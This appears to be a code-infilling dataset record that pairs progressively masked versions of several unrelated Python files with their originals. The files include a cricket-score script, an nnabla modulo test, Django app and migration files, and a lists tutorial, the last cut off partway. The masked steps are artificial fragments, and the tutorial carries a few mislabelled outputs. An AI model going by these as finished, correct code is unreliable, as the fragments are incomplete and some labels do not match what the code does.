{ "blob_id": "3d7ca468a1f7aa1602bff22167e9550ad515fa79", "index": 4777, "step-1": "<mask token>\n\n\ndef average(run):\n print('____________________________________')\n sum = 0\n for i in range(0, len(run)):\n sum += run[i]\n avg = sum / len(run)\n print('Average score of the team is :', avg)\n\n\ndef high(run):\n print('______________________________________')\n max = run[0]\n for i in range(len(run)):\n if max < run[i]:\n max = run[i]\n print('Highest run score by the player is :', max)\n\n\ndef low(run):\n print('____________________________________')\n mim = run[0]\n for i in range(len(run)):\n if mim > run[i]:\n mim = run[i]\n print('Lowest runs scored by the player is :', mim)\n\n\ndef check(run):\n print('_______________________________________')\n count = 0\n for i in range(0, len(run)):\n if run[i] >= 50:\n count += 1\n else:\n pass\n print(\"Count of the player score more than '50' are :\", count)\n\n\n<mask token>\n", "step-2": "<mask token>\n\n\ndef average(run):\n print('____________________________________')\n sum = 0\n for i in range(0, len(run)):\n sum += run[i]\n avg = sum / len(run)\n print('Average score of the team is :', avg)\n\n\ndef high(run):\n print('______________________________________')\n max = run[0]\n for i in range(len(run)):\n if max < run[i]:\n max = run[i]\n print('Highest run score by the player is :', max)\n\n\ndef low(run):\n print('____________________________________')\n mim = run[0]\n for i in range(len(run)):\n if mim > run[i]:\n mim = run[i]\n print('Lowest runs scored by the player is :', mim)\n\n\ndef check(run):\n print('_______________________________________')\n count = 0\n for i in range(0, len(run)):\n if run[i] >= 50:\n count += 1\n else:\n pass\n print(\"Count of the player score more than '50' are :\", count)\n\n\ndef feq(run):\n print('___________________________________')\n max = 0\n result = run[0]\n for i in run:\n freq = run.count(i)\n if freq > max:\n max = freq\n result = i\n print(f'run scored with the highest frequncy {result} is', max)\n print(\"-------------'THANKYOU---------------\")\n\n\n<mask token>\n", "step-3": "<mask token>\nfor i in range(no_players):\n run_score = int(input('Enter the runs scored by the player ' + str(i + \n 1) + ':'))\n run.append(run_score)\n\n\ndef average(run):\n print('____________________________________')\n sum = 0\n for i in range(0, len(run)):\n sum += run[i]\n avg = sum / len(run)\n print('Average score of the team is :', avg)\n\n\ndef high(run):\n print('______________________________________')\n max = run[0]\n for i in range(len(run)):\n if max < run[i]:\n max = run[i]\n print('Highest run score by the player is :', max)\n\n\ndef low(run):\n print('____________________________________')\n mim = run[0]\n for i in range(len(run)):\n if mim > run[i]:\n mim = run[i]\n print('Lowest runs scored by the player is :', mim)\n\n\ndef check(run):\n print('_______________________________________')\n count = 0\n for i in range(0, len(run)):\n if run[i] >= 50:\n count += 1\n else:\n pass\n print(\"Count of the player score more than '50' are :\", count)\n\n\ndef feq(run):\n print('___________________________________')\n max = 0\n result = run[0]\n for i in run:\n freq = run.count(i)\n if freq > max:\n max = freq\n result = i\n print(f'run scored with the highest frequncy {result} is', max)\n print(\"-------------'THANKYOU---------------\")\n\n\naverage(run)\nhigh(run)\nlow(run)\ncheck(run)\nfeq(run)\n", "step-4": "run = []\nno_players = int(input('enter the number of the players in the team :'))\nfor i in range(no_players):\n run_score = int(input('Enter the runs scored by the player ' + str(i + \n 1) + ':'))\n run.append(run_score)\n\n\ndef average(run):\n print('____________________________________')\n sum = 0\n for i in range(0, len(run)):\n sum += run[i]\n avg = sum / len(run)\n print('Average score of the team is :', avg)\n\n\ndef high(run):\n print('______________________________________')\n max = run[0]\n for i in range(len(run)):\n if max < run[i]:\n max = run[i]\n print('Highest run score by the player is :', max)\n\n\ndef low(run):\n print('____________________________________')\n mim = run[0]\n for i in range(len(run)):\n if mim > run[i]:\n mim = run[i]\n print('Lowest runs scored by the player is :', mim)\n\n\ndef check(run):\n print('_______________________________________')\n count = 0\n for i in range(0, len(run)):\n if run[i] >= 50:\n count += 1\n else:\n pass\n print(\"Count of the player score more than '50' are :\", count)\n\n\ndef feq(run):\n print('___________________________________')\n max = 0\n result = run[0]\n for i in run:\n freq = run.count(i)\n if freq > max:\n max = freq\n result = i\n print(f'run scored with the highest frequncy {result} is', max)\n print(\"-------------'THANKYOU---------------\")\n\n\naverage(run)\nhigh(run)\nlow(run)\ncheck(run)\nfeq(run)\n", "step-5": "run=[] #Creating a empty list \r\nno_players=int(input(\"enter the number of the players in the team :\")) \r\nfor i in range (no_players):\r\n run_score=int(input(\"Enter the runs scored by the player \"+str(i+1)+\":\"))\r\n run.append(run_score)\r\n#code for the average score of the team\r\ndef average(run):\r\n print(\"____________________________________\")\r\n sum=0\r\n for i in range (0,len(run)):\r\n sum+=run[i]\r\n avg=sum/len(run)\r\n print(\"Average score of the team is :\",avg)\r\n#code for the maximun runs scored by the players in the team\r\ndef high(run):\r\n print(\"______________________________________\")\r\n max=run[0]\r\n for i in range(len(run)):\r\n if max<run[i]:\r\n max=run[i]\r\n print(\"Highest run score by the player is :\",max)\r\n#code for the minimum runs scored by the players in the team\r\ndef low(run):\r\n print(\"____________________________________\")\r\n mim=run[0]\r\n for i in range(len(run)):\r\n if mim>run[i]:\r\n mim=run[i]\r\n print(\"Lowest runs scored by the player is :\",mim)\r\n#code for the runs scored more than 50 runs in the the team\r\ndef check(run): \r\n print(\"_______________________________________\") \r\n count=0\r\n for i in range(0,len(run)):\r\n if run[i]>=50:\r\n count+=1\r\n else:\r\n pass\r\n print(\"Count of the player score more than '50' are :\",count)\r\n#code for the runs scored for higher number of the frequency\r\ndef feq(run):\r\n print(\"___________________________________\")\r\n max=0\r\n result=run[0]\r\n for i in run:\r\n freq=run.count(i)\r\n if freq>max:\r\n max=freq\r\n result=i\r\n \r\n print(f\"run scored with the highest frequncy {result} is\",max)\r\n print(\"-------------'THANKYOU---------------\")\r\n\r\naverage(run)\r\nhigh(run)\r\nlow(run)\r\ncheck(run)\r\nfeq(run)\r\n\r\n\r\n", "step-ids": [ 4, 5, 6, 7, 8 ] }
[ 4, 5, 6, 7, 8 ]
# Copyright 2023 Sony Group Corporation. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import pytest import numpy as np import nnabla.functions as F from nbla_test_utils import list_context ctxs = list_context('Mod2') def ref_mod2(x0, x1, fmod): if x0.dtype == np.float32 or fmod == True: return np.fmod(x0, x1) else: return np.mod(x0, x1) @pytest.mark.parametrize("ctx, func_name", ctxs) @pytest.mark.parametrize("x0_shape, x1_shape", [ ((2, 3, 4), (2, 3, 4)), ((2, 3, 4), (1, 1, 1)), ((1, 1, 1), (2, 3, 4)), ]) @pytest.mark.parametrize('fmod', [False, True]) @pytest.mark.parametrize('dtype', [np.float32, np.int32]) @pytest.mark.parametrize("seed", [313]) def test_mod2_forward(seed, x0_shape, x1_shape, fmod, dtype, ctx, func_name): from nbla_test_utils import function_tester rng = np.random.RandomState(seed) if dtype == np.float32: inputs = [rng.randn(*x0_shape).astype(dtype), rng.randn(*x1_shape).astype(dtype)] else: inputs = [rng.randint(np.iinfo(dtype).min, np.iinfo(dtype).max, x0_shape).astype(dtype), rng.randint(np.iinfo(dtype).min, np.iinfo(dtype).max, x1_shape).astype(dtype)] backward = [False, False] func_args = [fmod] function_tester(rng, F.mod2, ref_mod2, inputs, func_name=func_name, func_args=func_args, atol_f=0, ctx=ctx, backward=backward)
normal
{ "blob_id": "32f10c3e73a3d792416f6b2841a80f8b3c390e8c", "index": 9194, "step-1": "<mask token>\n", "step-2": "<mask token>\n\n\ndef ref_mod2(x0, x1, fmod):\n if x0.dtype == np.float32 or fmod == True:\n return np.fmod(x0, x1)\n else:\n return np.mod(x0, x1)\n\n\[email protected]('ctx, func_name', ctxs)\[email protected]('x0_shape, x1_shape', [((2, 3, 4), (2, 3, 4)), ((2,\n 3, 4), (1, 1, 1)), ((1, 1, 1), (2, 3, 4))])\[email protected]('fmod', [False, True])\[email protected]('dtype', [np.float32, np.int32])\[email protected]('seed', [313])\ndef test_mod2_forward(seed, x0_shape, x1_shape, fmod, dtype, ctx, func_name):\n from nbla_test_utils import function_tester\n rng = np.random.RandomState(seed)\n if dtype == np.float32:\n inputs = [rng.randn(*x0_shape).astype(dtype), rng.randn(*x1_shape).\n astype(dtype)]\n else:\n inputs = [rng.randint(np.iinfo(dtype).min, np.iinfo(dtype).max,\n x0_shape).astype(dtype), rng.randint(np.iinfo(dtype).min, np.\n iinfo(dtype).max, x1_shape).astype(dtype)]\n backward = [False, False]\n func_args = [fmod]\n function_tester(rng, F.mod2, ref_mod2, inputs, func_name=func_name,\n func_args=func_args, atol_f=0, ctx=ctx, backward=backward)\n", "step-3": "<mask token>\nctxs = list_context('Mod2')\n\n\ndef ref_mod2(x0, x1, fmod):\n if x0.dtype == np.float32 or fmod == True:\n return np.fmod(x0, x1)\n else:\n return np.mod(x0, x1)\n\n\[email protected]('ctx, func_name', ctxs)\[email protected]('x0_shape, x1_shape', [((2, 3, 4), (2, 3, 4)), ((2,\n 3, 4), (1, 1, 1)), ((1, 1, 1), (2, 3, 4))])\[email protected]('fmod', [False, True])\[email protected]('dtype', [np.float32, np.int32])\[email protected]('seed', [313])\ndef test_mod2_forward(seed, x0_shape, x1_shape, fmod, dtype, ctx, func_name):\n from nbla_test_utils import function_tester\n rng = np.random.RandomState(seed)\n if dtype == np.float32:\n inputs = [rng.randn(*x0_shape).astype(dtype), rng.randn(*x1_shape).\n astype(dtype)]\n else:\n inputs = [rng.randint(np.iinfo(dtype).min, np.iinfo(dtype).max,\n x0_shape).astype(dtype), rng.randint(np.iinfo(dtype).min, np.\n iinfo(dtype).max, x1_shape).astype(dtype)]\n backward = [False, False]\n func_args = [fmod]\n function_tester(rng, F.mod2, ref_mod2, inputs, func_name=func_name,\n func_args=func_args, atol_f=0, ctx=ctx, backward=backward)\n", "step-4": "import pytest\nimport numpy as np\nimport nnabla.functions as F\nfrom nbla_test_utils import list_context\nctxs = list_context('Mod2')\n\n\ndef ref_mod2(x0, x1, fmod):\n if x0.dtype == np.float32 or fmod == True:\n return np.fmod(x0, x1)\n else:\n return np.mod(x0, x1)\n\n\[email protected]('ctx, func_name', ctxs)\[email protected]('x0_shape, x1_shape', [((2, 3, 4), (2, 3, 4)), ((2,\n 3, 4), (1, 1, 1)), ((1, 1, 1), (2, 3, 4))])\[email protected]('fmod', [False, True])\[email protected]('dtype', [np.float32, np.int32])\[email protected]('seed', [313])\ndef test_mod2_forward(seed, x0_shape, x1_shape, fmod, dtype, ctx, func_name):\n from nbla_test_utils import function_tester\n rng = np.random.RandomState(seed)\n if dtype == np.float32:\n inputs = [rng.randn(*x0_shape).astype(dtype), rng.randn(*x1_shape).\n astype(dtype)]\n else:\n inputs = [rng.randint(np.iinfo(dtype).min, np.iinfo(dtype).max,\n x0_shape).astype(dtype), rng.randint(np.iinfo(dtype).min, np.\n iinfo(dtype).max, x1_shape).astype(dtype)]\n backward = [False, False]\n func_args = [fmod]\n function_tester(rng, F.mod2, ref_mod2, inputs, func_name=func_name,\n func_args=func_args, atol_f=0, ctx=ctx, backward=backward)\n", "step-5": "# Copyright 2023 Sony Group Corporation.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport pytest\nimport numpy as np\nimport nnabla.functions as F\nfrom nbla_test_utils import list_context\n\nctxs = list_context('Mod2')\n\n\ndef ref_mod2(x0, x1, fmod):\n if x0.dtype == np.float32 or fmod == True:\n return np.fmod(x0, x1)\n else:\n return np.mod(x0, x1)\n\n\[email protected](\"ctx, func_name\", ctxs)\[email protected](\"x0_shape, x1_shape\", [\n ((2, 3, 4), (2, 3, 4)),\n ((2, 3, 4), (1, 1, 1)),\n ((1, 1, 1), (2, 3, 4)),\n])\[email protected]('fmod', [False, True])\[email protected]('dtype', [np.float32, np.int32])\[email protected](\"seed\", [313])\ndef test_mod2_forward(seed, x0_shape, x1_shape, fmod, dtype, ctx, func_name):\n from nbla_test_utils import function_tester\n rng = np.random.RandomState(seed)\n if dtype == np.float32:\n inputs = [rng.randn(*x0_shape).astype(dtype),\n rng.randn(*x1_shape).astype(dtype)]\n else:\n inputs = [rng.randint(np.iinfo(dtype).min, np.iinfo(dtype).max, x0_shape).astype(dtype),\n rng.randint(np.iinfo(dtype).min, np.iinfo(dtype).max, x1_shape).astype(dtype)]\n backward = [False, False]\n func_args = [fmod]\n function_tester(rng, F.mod2, ref_mod2, inputs,\n func_name=func_name, func_args=func_args,\n atol_f=0, ctx=ctx, backward=backward)\n", "step-ids": [ 0, 2, 3, 4, 5 ] }
[ 0, 2, 3, 4, 5 ]
from django.apps import AppConfig class ActivityConfig(AppConfig): name = 'apps.activity'
normal
{ "blob_id": "2a69aa0cd9d0e39ad82d6a354e956bdad0648797", "index": 2252, "step-1": "<mask token>\n", "step-2": "<mask token>\n\n\nclass ActivityConfig(AppConfig):\n <mask token>\n", "step-3": "<mask token>\n\n\nclass ActivityConfig(AppConfig):\n name = 'apps.activity'\n", "step-4": "from django.apps import AppConfig\n\n\nclass ActivityConfig(AppConfig):\n name = 'apps.activity'\n", "step-5": null, "step-ids": [ 0, 1, 2, 3 ] }
[ 0, 1, 2, 3 ]
# -*- coding: utf-8 -*- # Generated by Django 1.10.3 on 2018-12-20 13:06 from __future__ import unicode_literals from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('login', '0006_usermovies_img'), ] operations = [ migrations.AddField( model_name='moviesinfo', name='country', field=models.CharField(default=1, max_length=50), preserve_default=False, ), migrations.AddField( model_name='moviesinfo', name='description', field=models.CharField(default=1, max_length=200), preserve_default=False, ), migrations.AddField( model_name='moviesinfo', name='director', field=models.CharField(default=1, max_length=100), preserve_default=False, ), migrations.AddField( model_name='moviesinfo', name='grenre', field=models.CharField(default=1, max_length=50), preserve_default=False, ), migrations.AddField( model_name='moviesinfo', name='year', field=models.CharField(default=1, max_length=8), preserve_default=False, ), migrations.AddField( model_name='usermovies', name='country', field=models.CharField(default=1, max_length=50), preserve_default=False, ), migrations.AddField( model_name='usermovies', name='description', field=models.CharField(default=1, max_length=200), preserve_default=False, ), migrations.AddField( model_name='usermovies', name='director', field=models.CharField(default=1, max_length=100), preserve_default=False, ), migrations.AddField( model_name='usermovies', name='grenre', field=models.CharField(default=1, max_length=50), preserve_default=False, ), migrations.AddField( model_name='usermovies', name='year', field=models.CharField(default=1, max_length=8), preserve_default=False, ), ]
normal
{ "blob_id": "e67cbddf10440e8a31373e05a82840677d3045f5", "index": 4388, "step-1": "<mask token>\n", "step-2": "<mask token>\n\n\nclass Migration(migrations.Migration):\n <mask token>\n <mask token>\n", "step-3": "<mask token>\n\n\nclass Migration(migrations.Migration):\n dependencies = [('login', '0006_usermovies_img')]\n operations = [migrations.AddField(model_name='moviesinfo', name=\n 'country', field=models.CharField(default=1, max_length=50),\n preserve_default=False), migrations.AddField(model_name=\n 'moviesinfo', name='description', field=models.CharField(default=1,\n max_length=200), preserve_default=False), migrations.AddField(\n model_name='moviesinfo', name='director', field=models.CharField(\n default=1, max_length=100), preserve_default=False), migrations.\n AddField(model_name='moviesinfo', name='grenre', field=models.\n CharField(default=1, max_length=50), preserve_default=False),\n migrations.AddField(model_name='moviesinfo', name='year', field=\n models.CharField(default=1, max_length=8), preserve_default=False),\n migrations.AddField(model_name='usermovies', name='country', field=\n models.CharField(default=1, max_length=50), preserve_default=False),\n migrations.AddField(model_name='usermovies', name='description',\n field=models.CharField(default=1, max_length=200), preserve_default\n =False), migrations.AddField(model_name='usermovies', name=\n 'director', field=models.CharField(default=1, max_length=100),\n preserve_default=False), migrations.AddField(model_name=\n 'usermovies', name='grenre', field=models.CharField(default=1,\n max_length=50), preserve_default=False), migrations.AddField(\n model_name='usermovies', name='year', field=models.CharField(\n default=1, max_length=8), preserve_default=False)]\n", "step-4": "from __future__ import unicode_literals\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n dependencies = [('login', '0006_usermovies_img')]\n operations = [migrations.AddField(model_name='moviesinfo', name=\n 'country', field=models.CharField(default=1, max_length=50),\n preserve_default=False), migrations.AddField(model_name=\n 'moviesinfo', name='description', field=models.CharField(default=1,\n max_length=200), preserve_default=False), migrations.AddField(\n model_name='moviesinfo', name='director', field=models.CharField(\n default=1, max_length=100), preserve_default=False), migrations.\n AddField(model_name='moviesinfo', name='grenre', field=models.\n CharField(default=1, max_length=50), preserve_default=False),\n migrations.AddField(model_name='moviesinfo', name='year', field=\n models.CharField(default=1, max_length=8), preserve_default=False),\n migrations.AddField(model_name='usermovies', name='country', field=\n models.CharField(default=1, max_length=50), preserve_default=False),\n migrations.AddField(model_name='usermovies', name='description',\n field=models.CharField(default=1, max_length=200), preserve_default\n =False), migrations.AddField(model_name='usermovies', name=\n 'director', field=models.CharField(default=1, max_length=100),\n preserve_default=False), migrations.AddField(model_name=\n 'usermovies', name='grenre', field=models.CharField(default=1,\n max_length=50), preserve_default=False), migrations.AddField(\n model_name='usermovies', name='year', field=models.CharField(\n default=1, max_length=8), preserve_default=False)]\n", "step-5": "# -*- coding: utf-8 -*-\n# Generated by Django 1.10.3 on 2018-12-20 13:06\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('login', '0006_usermovies_img'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='moviesinfo',\n name='country',\n field=models.CharField(default=1, max_length=50),\n preserve_default=False,\n ),\n migrations.AddField(\n model_name='moviesinfo',\n name='description',\n field=models.CharField(default=1, max_length=200),\n preserve_default=False,\n ),\n migrations.AddField(\n model_name='moviesinfo',\n name='director',\n field=models.CharField(default=1, max_length=100),\n preserve_default=False,\n ),\n migrations.AddField(\n model_name='moviesinfo',\n name='grenre',\n field=models.CharField(default=1, max_length=50),\n preserve_default=False,\n ),\n migrations.AddField(\n model_name='moviesinfo',\n name='year',\n field=models.CharField(default=1, max_length=8),\n preserve_default=False,\n ),\n migrations.AddField(\n model_name='usermovies',\n name='country',\n field=models.CharField(default=1, max_length=50),\n preserve_default=False,\n ),\n migrations.AddField(\n model_name='usermovies',\n name='description',\n field=models.CharField(default=1, max_length=200),\n preserve_default=False,\n ),\n migrations.AddField(\n model_name='usermovies',\n name='director',\n field=models.CharField(default=1, max_length=100),\n preserve_default=False,\n ),\n migrations.AddField(\n model_name='usermovies',\n name='grenre',\n field=models.CharField(default=1, max_length=50),\n preserve_default=False,\n ),\n migrations.AddField(\n model_name='usermovies',\n name='year',\n field=models.CharField(default=1, max_length=8),\n preserve_default=False,\n ),\n ]\n", "step-ids": [ 0, 1, 2, 3, 4 ] }
[ 0, 1, 2, 3, 4 ]
def sort_descending(numbers): numbers.sort(reverse=True)
normal
{ "blob_id": "46dc9917d9b3a7caf8d7ba5024b17d3b755fc5db", "index": 7278, "step-1": "<mask token>\n", "step-2": "def sort_descending(numbers):\n numbers.sort(reverse=True)\n", "step-3": null, "step-4": null, "step-5": null, "step-ids": [ 0, 1 ] }
[ 0, 1 ]
# Lists are sequence of objects # Mutable # Lists are represented within square brackets and items are seperated by commas #-----------------------------------Lists-----------------------------------# # Lists of Numbers print("\n1. Lists of Numbers") print("\t" + str([1,2,3])) # Lists of Strings print("\n2. Lists of Strings") print("\t" + str(["Lemon","Mango","Papaya"])) list_fruits =["Lemon","Mango","Papaya"] print("\tMy favorite fruit is " + list_fruits[1]) print("\n3. List operations") #Replace items within list list_fruits[2]="Water Melons" print("\tNew List: " + str(list_fruits)) #Create Empty List list_Organizations = [] print("\n5. Create empty list") print("\tList of Organizations: " + str(list_Organizations)) #Add values to list print("\n5. Add values to list") list_Organizations.append("Microsoft") list_Organizations.append("Amazon") list_Organizations.append("Google") print("\tAppend List of Organizations: " + str(list_Organizations)) #List of characters within string print("\tList of characters in string:" + str(list("Sandeep Dhamale"))) # Retrieve List using for loop print("\n6. Retrieve List using for loop") for organization in list_Organizations: print("\t" + organization) # Get specific elements within list: Slicing print("\n7. Get specific elements within list: Slicing") list_numbers = [1,2,3,4,5] sub_list_numbers = list_numbers[1:3] print("\tSub list: " + str(sub_list_numbers)) print("\tLast element in list: " + str(list_numbers[-1])) print("\tGet all elements in list except first and lasr: " + str(list_numbers[1:-1])) print("\tElements from index 2 in list: " + str(list_numbers[2:])) print("\tElements till index 4 in list: " + str(list_numbers[:4])) #Copying Lists to other list - Shallow copy print("\n8. Copying Lists to other list") list_numbers_direct = list_numbers print("\tUsing assignment. Is list_numbers_direct is list_numbers " + str(list_numbers_direct is list_numbers)) list_numbers_list_values = list_numbers[:] print("\tUsing assignment. Is list_numbers_list_values is list_numbers " + str(list_numbers_list_values is list_numbers)) list_numbers_copy = list_numbers.copy() print("\tUsing assignment. Is list_numbers_copy is list_numbers " + str(list_numbers_copy is list_numbers)) list_numbers_list = list(list_numbers) print("\tUsing assignment. Is list_numbers_list is list_numbers " + str(list_numbers_list is list_numbers)) print("\n9. Note: Although the copies are not equal the objects inside the lists are equal") list_of_list = [[1,2],[3,4]] copy_list_of_list = list_of_list[:] print("\tcopy_list_of_list is list_of_list: " + str(copy_list_of_list is list_of_list)) print("\tcopy_list_of_list[element] is list_of_list[element]: " + str(copy_list_of_list[0] is list_of_list[0])) print("\tEven if the values are modified e.g. append the list will be same") list_of_list[0].append('a') print("\tlist_of_list: " + str(list_of_list)) print("\tcopy_list_of_list: " + str(copy_list_of_list)) print("\tcopy_list_of_list[element] is list_of_list[element]: " + str(copy_list_of_list[0] is list_of_list[0])) print("\n10.Search in a list: list.index() - Returns the first matched element") temp_string = "Python is easy scripting language. It is easy to learn and build apps using Python." temp_string_list = temp_string.split(" ") print("\tString: " + temp_string) print("\tString list: " + str(temp_string_list)) print("\tSearch a sub string in string list using list.index(): " + str(temp_string_list.index("scripting"))) print("\n11.Count occurrence of substring in list") print("\tCount occurrence of substring Python: " + str(temp_string_list.count("easy"))) print("\n12.Remove substring from string list") del temp_string_list[3] print("\tA. Remove substring from list using del (by index): " + str(temp_string_list)) print("\tOriginal string is unaffected: " + str(temp_string)) temp_string_list.remove("learn") print("\tB. Remove substring from list using remove (by value): " + str(temp_string_list)) print("\tOriginal string is unaffected: " + str(temp_string)) print("\n12.Insert a substring in string. list.insert()") temp_string_list.insert(3, "scripting") print("\tA. Insert substring to list (at index): " + str(temp_string_list)) print("\tOriginal string is unaffected: " + str(temp_string)) print("\n13.Concatenating lists.") temp_list_1=[1,2,3] temp_list_2 = [4,5,6] temp_list = temp_list_1 + temp_list_2 print("\ta. temp_list = temp_list_1 + temp_list_2 = " + str(temp_list)) temp_list+=temp_list print("\tb. temp_list += temp_list " + str(temp_list)) temp_list.extend([7,8,9]) print("\tc. temp_list.extend() " + str(temp_list)) print("\n14. Reversing lists.") temp_list.reverse() print("Reverse temp list: "+ str(temp_list)) print("\n15. Sorting lists.") temp_list = [5,55,555] temp_list.sort() print("\tSorted list: " + str(temp_list)) temp_list.sort(reverse=True) print("\tSorted list: " + str(temp_list)) print("\tSorting lists by callable functions (inbuilt) e.g. len using 'key") temp_string = "I am a software tester." temp_string_list = temp_string.split() print("\tString list: " + str(temp_string_list)) temp_string_list.sort(key=len) print("\tSort by length of each word: " + str(temp_string_list)) temp_number_list=[3,45,12,1,99,44] print("\n16. Using Sorted (copy of sort) instead of sort. and reversed to avoid modifications in original list.") x=[4, 9, 2, 1] y = x y.sort() print("\t y= " + str(y)) print("\t x= " + str(x)) x=[4, 9, 2, 1] print("\t y= " + str(sorted(x))) print("\t x= " + str(x)) print("\t z= " + str(list(reversed(x)))) print("\t x= " + str(x))
normal
{ "blob_id": "4d35bb83378805daf4392a1752386ab1403404e0", "index": 1530, "step-1": "<mask token>\n", "step-2": "print(\"\"\"\n1. Lists of Numbers\"\"\")\nprint('\\t' + str([1, 2, 3]))\nprint(\"\"\"\n2. Lists of Strings\"\"\")\nprint('\\t' + str(['Lemon', 'Mango', 'Papaya']))\n<mask token>\nprint('\\tMy favorite fruit is ' + list_fruits[1])\nprint(\"\"\"\n3. List operations\"\"\")\n<mask token>\nprint('\\tNew List: ' + str(list_fruits))\n<mask token>\nprint(\"\"\"\n5. Create empty list\"\"\")\nprint('\\tList of Organizations: ' + str(list_Organizations))\nprint(\"\"\"\n5. Add values to list\"\"\")\nlist_Organizations.append('Microsoft')\nlist_Organizations.append('Amazon')\nlist_Organizations.append('Google')\nprint('\\tAppend List of Organizations: ' + str(list_Organizations))\nprint('\\tList of characters in string:' + str(list('Sandeep Dhamale')))\nprint(\"\"\"\n6. Retrieve List using for loop\"\"\")\nfor organization in list_Organizations:\n print('\\t' + organization)\nprint(\"\"\"\n7. Get specific elements within list: Slicing\"\"\")\n<mask token>\nprint('\\tSub list: ' + str(sub_list_numbers))\nprint('\\tLast element in list: ' + str(list_numbers[-1]))\nprint('\\tGet all elements in list except first and lasr: ' + str(\n list_numbers[1:-1]))\nprint('\\tElements from index 2 in list: ' + str(list_numbers[2:]))\nprint('\\tElements till index 4 in list: ' + str(list_numbers[:4]))\nprint(\"\"\"\n8. Copying Lists to other list\"\"\")\n<mask token>\nprint('\\tUsing assignment. Is list_numbers_direct is list_numbers ' + str(\n list_numbers_direct is list_numbers))\n<mask token>\nprint('\\tUsing assignment. Is list_numbers_list_values is list_numbers ' +\n str(list_numbers_list_values is list_numbers))\n<mask token>\nprint('\\tUsing assignment. Is list_numbers_copy is list_numbers ' + str(\n list_numbers_copy is list_numbers))\n<mask token>\nprint('\\tUsing assignment. Is list_numbers_list is list_numbers ' + str(\n list_numbers_list is list_numbers))\nprint(\n \"\"\"\n9. Note: Although the copies are not equal the objects inside the lists are equal\"\"\"\n )\n<mask token>\nprint('\\tcopy_list_of_list is list_of_list: ' + str(copy_list_of_list is\n list_of_list))\nprint('\\tcopy_list_of_list[element] is list_of_list[element]: ' + str(\n copy_list_of_list[0] is list_of_list[0]))\nprint('\\tEven if the values are modified e.g. append the list will be same')\nlist_of_list[0].append('a')\nprint('\\tlist_of_list: ' + str(list_of_list))\nprint('\\tcopy_list_of_list: ' + str(copy_list_of_list))\nprint('\\tcopy_list_of_list[element] is list_of_list[element]: ' + str(\n copy_list_of_list[0] is list_of_list[0]))\nprint(\n \"\"\"\n10.Search in a list: list.index() - Returns the first matched element\"\"\"\n )\n<mask token>\nprint('\\tString: ' + temp_string)\nprint('\\tString list: ' + str(temp_string_list))\nprint('\\tSearch a sub string in string list using list.index(): ' + str(\n temp_string_list.index('scripting')))\nprint(\"\"\"\n11.Count occurrence of substring in list\"\"\")\nprint('\\tCount occurrence of substring Python: ' + str(temp_string_list.\n count('easy')))\nprint(\"\"\"\n12.Remove substring from string list\"\"\")\ndel temp_string_list[3]\nprint('\\tA. Remove substring from list using del (by index): ' + str(\n temp_string_list))\nprint('\\tOriginal string is unaffected: ' + str(temp_string))\ntemp_string_list.remove('learn')\nprint('\\tB. Remove substring from list using remove (by value): ' + str(\n temp_string_list))\nprint('\\tOriginal string is unaffected: ' + str(temp_string))\nprint(\"\"\"\n12.Insert a substring in string. list.insert()\"\"\")\ntemp_string_list.insert(3, 'scripting')\nprint('\\tA. Insert substring to list (at index): ' + str(temp_string_list))\nprint('\\tOriginal string is unaffected: ' + str(temp_string))\nprint(\"\"\"\n13.Concatenating lists.\"\"\")\n<mask token>\nprint('\\ta. temp_list = temp_list_1 + temp_list_2 = ' + str(temp_list))\ntemp_list += temp_list\nprint('\\tb. temp_list += temp_list ' + str(temp_list))\ntemp_list.extend([7, 8, 9])\nprint('\\tc. temp_list.extend() ' + str(temp_list))\nprint(\"\"\"\n14. Reversing lists.\"\"\")\ntemp_list.reverse()\nprint('Reverse temp list: ' + str(temp_list))\nprint(\"\"\"\n15. Sorting lists.\"\"\")\n<mask token>\ntemp_list.sort()\nprint('\\tSorted list: ' + str(temp_list))\ntemp_list.sort(reverse=True)\nprint('\\tSorted list: ' + str(temp_list))\nprint(\"\\tSorting lists by callable functions (inbuilt) e.g. len using 'key\")\n<mask token>\nprint('\\tString list: ' + str(temp_string_list))\ntemp_string_list.sort(key=len)\nprint('\\tSort by length of each word: ' + str(temp_string_list))\n<mask token>\nprint(\n \"\"\"\n16. Using Sorted (copy of sort) instead of sort. and reversed to avoid modifications in original list.\"\"\"\n )\n<mask token>\ny.sort()\nprint('\\t y= ' + str(y))\nprint('\\t x= ' + str(x))\n<mask token>\nprint('\\t y= ' + str(sorted(x)))\nprint('\\t x= ' + str(x))\nprint('\\t z= ' + str(list(reversed(x))))\nprint('\\t x= ' + str(x))\n", "step-3": "print(\"\"\"\n1. Lists of Numbers\"\"\")\nprint('\\t' + str([1, 2, 3]))\nprint(\"\"\"\n2. Lists of Strings\"\"\")\nprint('\\t' + str(['Lemon', 'Mango', 'Papaya']))\nlist_fruits = ['Lemon', 'Mango', 'Papaya']\nprint('\\tMy favorite fruit is ' + list_fruits[1])\nprint(\"\"\"\n3. List operations\"\"\")\nlist_fruits[2] = 'Water Melons'\nprint('\\tNew List: ' + str(list_fruits))\nlist_Organizations = []\nprint(\"\"\"\n5. Create empty list\"\"\")\nprint('\\tList of Organizations: ' + str(list_Organizations))\nprint(\"\"\"\n5. Add values to list\"\"\")\nlist_Organizations.append('Microsoft')\nlist_Organizations.append('Amazon')\nlist_Organizations.append('Google')\nprint('\\tAppend List of Organizations: ' + str(list_Organizations))\nprint('\\tList of characters in string:' + str(list('Sandeep Dhamale')))\nprint(\"\"\"\n6. Retrieve List using for loop\"\"\")\nfor organization in list_Organizations:\n 